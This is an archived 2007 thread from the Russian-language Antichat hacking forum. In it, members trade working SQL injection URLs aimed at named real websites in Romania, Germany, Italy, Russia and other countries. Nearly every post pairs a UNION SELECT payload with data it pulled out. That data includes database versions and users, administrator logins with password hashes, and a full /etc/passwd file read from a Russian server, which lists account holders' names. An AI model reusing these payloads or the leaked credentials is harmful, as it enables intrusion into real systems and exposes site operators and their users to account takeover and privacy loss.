ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.11.2007, 12:26
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
adventistmuntenia.ro
Код:
http://www.adventistmuntenia.ro/newstext.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
4.0.27-standard-log:muntenia_su:muntenia_su@localhost
Последний раз редактировалось fRg; 19.11.2007 в 15:39..
|
|
|
19.11.2007, 15:16
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
arhitectura1906.ro
Код:
http://www.arhitectura1906.ro/newsdetail.php?id_nws=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard:usr_web15_2:web15@localhost
romanialibera.com
Код:
http://www.romanialibera.com/articole/articol.php?care=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a,version(),database(),user())/*
4.1.20:romanialibera_com:rldbadmin@localhost
Нашёл таблу useri, а в ней одно поле - email
Последний раз редактировалось fRg; 19.11.2007 в 15:43..
|
|
|
|
19.11.2007, 15:42
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156
Репутация:
50
|
|
Разбираем №2 
Код:
http://www.freefeasibilities.biz/links.php?link_id=-999+union+select+1,user(),version(),4,5,6/*
Код:
http://www.black-gold.de/games.php?game_id=-999+union+select+1,2,3,4,5,6,7/*
Код:
http://www.internet-allround.de/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
Код:
http://www.bobis24-shop.de/catalog/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9,10/*
Код:
http://www.bobolandia.com/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
Код:
http://www.accountablebanking.com/links.php?link_id=-999+union+select+1,2,3,4,concat(user,0x3a,password),6,7,8,9,10,11+from+mysql.user/*
bh:3a0293a9050b30f9 |
|
|
|
19.11.2007, 22:17
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Код:
http://www.barriodelcarmen.net/evolucion/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
Alex:2b132404fa9459ff3e6acec9737d3266
Код:
http://www.maynooth.org/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
Admin:5fec178cdc2f426f64764b87eaa5b9d7 |
|
|
|
19.11.2007, 23:04
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
Код:
http://www.classicalsource.com/db_control/db_concert_review.php?id=-3392+union+select+concat(user_name,0x3a,password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user+limit+1,1/*
Код:
http://www.board.46info.ru/catlinks/info/?id=-3221+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()),20,21,22,23,24/*
|
|
|
|
19.11.2007, 23:24
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
http://bitteam.ru/
Код:
http://bitteam.ru/?menu=22&id=-1'+union+select+null,user(),null,null,null,null,null,null,null,null/*
user: 1gb_bitcms@81.176.226.10
database: 1gb_bitcms
mysql: 4.1.21-community-max-nt-log
|
|
|
|
20.11.2007, 01:09
|
|
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171
Репутация:
88
|
|
Код:
http://www.webmasters.org/scripts/software-description.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,Table_Name,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables/*
есть доступ к Information_schema.tables
одна из интересных таблиц sbwmd_admin
надеюсь не боян, проверить в данный момент не могу
Последний раз редактировалось -MoLoToK-; 20.11.2007 в 04:34..
|
|
|
|
20.11.2007, 01:42
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
www.teleset-ufa.ru
_http://www.teleset-ufa.ru/news.php?id=-3+union+select+1,file_priv,user,password+from+mysq l.user
root:5aff30257b10b358
file_priv - Y
_http://www.teleset-ufa.ru/news.php?id=-3+union+select+1,2,3,LOAD_FILE('/etc/passwd')
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0  perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false snort:x:100:104:Snort user:/etc/snort.d/log:/bin/bash torrent:x:101:105:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh and:x:500:500:Andrey:/home/and:/bin/bash office:x:501:100:рПЮФПЧЩК СЭЙЛ ПЖЙУБ:/home/office:/bin/sh serega:x:502:100:лМЙНЙО уЕТЗЕК:/home/serega:/bin/sh mysql:x:102:106:MySQL server:/var/lib/mysql:/bin/bash cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash exim:x:93:93::/var/spool/exim:/sbin/nologin boss:x:504:502:рПОПНБТЈЧБ пЛУБОБ чСЮЕУМБЧПЧОБ:/home/boss:/bin/sh jabber:x:103:107:Jabber Server:/var/lib/jabberd:/bin/bash alia:x:505:503:нБЧМЕФЛХМПЧ жБТЙФ фХИЧБФХММПЧЙЮ:/home/alia:/bin/sh karavanov:x:506:504:лБТБЧБОПЧ уЕТЗЕК бМЕЛУЕЕЧЙЮ:/home/karavanov:/bin/sh andrey:x:507:507::/home/andrey:/bin/bash test:x:508:508::/home/test:/bin/bash andrey3510:x:509:100:чБТЙЛПЧ бОДТЕК бМЕЛУБОДТПЧЙЮ:/home/andrey3510:/bin/sh albina:x:510:100:вБИФЙЗБТЕЕЧ бЪБФ нХИБНЕФПЧЙЮ:/home/albina:/bin/sh gimall:x:511:100:зЙНБМЕФДЙОПЧ бКТБФ бЛТБНПЧЙЮ:/home/gimall:/bin/sh magner:x:512:100:ппп рБТЙФЕФ:/home/magner:/bin/sh nelli:x:513:100:ъЙСОЗЙТПЧБ оЕММЙ нБТБФПЧОБ:/home/nelli:/bin/sh kniga:x:515:100:мЩУЕОЛПЧБ н.а.:/home/kniga:/bin/sh qtss:x:516:516::/home/qtss:/bin/bash cristina:x:517:100:оБЪБТПЧ йЗПТШ бОБФПМШЕЧЙЮ:/home/cristina:/bin/sh mops:x:518:100::/home/mops:/bin/sh tanya:x:519:100:жЕДПУЕЕЧБ ф.а.:/home/tanya:/bin/sh lena:x:520:100::/home/lena:/bin/sh halim73:x:521:100::/home/halim73:/bin/sh marsel:x:522:100::/home/marsel:/bin/sh step:x:523:100::/home/step:/bin/sh shahyagan:x:524:100:нХИБНБДЕЕЧ с.и.:/home/shahyagan:/bin/sh azat:x:525:100:йУБОВБЕЧ бЪБФ:/home/azat:/bin/sh ruspak:x:526:100::/home/ruspak:/bin/sh vatslav:x:527:100:вБТЭЕЧУЛЙК ч.о.:/home/vatslav:/bin/sh veronica:x:528:100:бВТБНПЧБ б.р.:/home/veronica:/bin/sh helt:x:529:100:пМЕЗ:/home/helt:/bin/sh robert:x:530:100::/home/robert:/bin/sh luiza:x:531:100::/home/luiza:/bin/sh oleshka:x:532:100::/home/oleshka:/bin/sh rezeda:x:533:100::/home/rezeda:/bin/sh sergey:x:534:100::/home/sergey:/bin/sh sever:x:535:100::/home/sever:/bin/sh abn:x:536:100::/home/abn:/bin/sh iserverd:x:537:505::/home/iserverd:/bin/sh chistya:x:538:100::/home/chistya:/bin/sh angela:x:539:100::/home/angela:/bin/sh ashotik:x:540:100::/home/ashotik:/bin/sh igor:x:541:100::/home/igor:/bin/sh katerina:x:542:100::/home/katerina:/bin/sh vlad:x:543:100::/home/vlad:/bin/sh kane:x:544:100::/home/kane:/bin/sh xdamirx:x:545:100::/home/xdamirx:/bin/sh polaris:x:546:100::/home/polaris:/bin/sh albert:x:547:100::/home/albert:/bin/sh air:x:548:100::/home/air:/bin/sh bruise:x:549:100::/home/bruise:/bin/sh biks:x:550:100::/home/biks:/bin/sh alternativa:x:551:100::/home/alternativa:/bin/sh dinar:x:552:100::/home/dinar:/bin/sh arturguzalia:x:553:100::/home/arturguzalia:/bin/sh halgrim:x:554:100::/home/halgrim:/bin/sh gainceva:x:555:100::/home/gainceva:/bin/sh mifor:x:556:100::/home/mifor:/bin/sh maviol:x:557:100::/home/maviol:/bin/sh sa-milt:x:104:110:SpamAssassin Milter:/var/run/spamass-milter:/sbin/nologin nikita:x:558:100::/home/nikita:/bin/sh leila:x:559:100:leila:/home/leila:/bin/sh clamav:x:105:111:Clam Anti Virus Checker:/var/clamav:/sbin/nologin mihail:x:514:100::/home/mihail:/bin/sh bill:x:503:100:billing:/home/bill:/bin/sh sony:x:560:100::/home/sony:/bin/sh anastasia:x:561:501::/home/anastasia:/bin/sh lartem:x:562:100::/home/lartem:/bin/sh naelsi:x:563:100::/home/naelsi:/bin/sh eliza:x:564:100::/home/eliza:/bin/sh yulia:x:565:100::/home/yulia:/bin/sh vibro:x:566:100::/home/vibro:/bin/sh vaisovna:x:567:100::/home/vaisovna:/bin/sh ildar:x:568:100::/home/ildar:/bin/sh uliya:x:569:100::/home/uliya:/bin/sh support:x:570:100::/home/support:/bin/sh aetrik:x:571:100::/home/aetrik:/bin/sh design:x:572:100::/home/design:/bin/sh icecast:x:573:517:IceCast Server:/usr/local/share/icecast:/sbin/nologin victoria:x:574:100::/home/victoria:/bin/sh shalun73:x:575:100::/home/shalun73:/bin/sh local:x:576:100::/home/local:/bin/sh nukhov:x:577:100::/home/nukhov:/bin/sh named:x:25:25:Named:/var/named:/sbin/nologin evgeniyklepcov:x:578:100::/home/evgeniyklepcov:/bin/sh postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash romeo:x:579:100::/home/romeo:/bin/sh inna:x:580:100::/home/inna:/bin/sh lipatov:x:581:100::/home/lipatov:/bin/sh znaki:x:582:100::/home/znaki:/bin/sh isaeva:x:583:100::/home/isaeva:/bin/sh blacksun:x:584:100::/home/blacksun:/bin/sh hamzin:x:585:509::/home/hamzin:/bin/sh lilya:x:586:100::/home/lilya:/bin/sh aidunov:x:587:100::/home/aidunov:/bin/sh andreevs:x:588:100::/home/andreevs:/bin/sh aniufa:x:589:48::/var/www/aniufa:/bin/sh olesya:x:590:100::/home/olesya:/bin/sh
|
|
|
|
20.11.2007, 02:52
|
|
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920
Репутация:
369
|
|
Решил до Италии добраться в ответ на топик в Новостях о том, что русские сайты - самые плохие, а итальянские - лучшие =)
www.sodalitas.it
Код:
_http://www.sodalitas.it/news.php?ID=9+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+user
Group и Order не помогли. =(
Думал, запарюсь, пока подберу столбцы, но на 46-ом все закончилось. Фу-х =)
Нужная нам таблица: user
Нужный нам user: admin
Колонки в user: user, password |
|
|
|
20.11.2007, 09:35
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Исследуем Румынию
ziuaiasi.ro
Код:
http://www.ziuaiasi.ro/articol.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*
5.0.27-log:ziua:ziua@localhost
81 таблицa:
Код:
http://www.ziuaiasi.ro/articol.html?id=-1+union+select+1,2,3,4,5,6,table_name,8,9+from+information_schema.tables+limit+80,1/*
Поля табы users:
Код:
id, userId, nume, parola, mail, varsta, oras, studii, newsletter, data, activ
Поля табы phpbb_users:
Код:
user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
Админ форума ( login:md5[password]):
Код:
webmaster:e0afac77ae41af23c696457742954ac5
electronica-azi.ro
Код:
http://www.electronica-azi.ro/articol.php?id_ar=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18/*
4.0.27-log:electronicaazi:electronicaazi@localhost
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
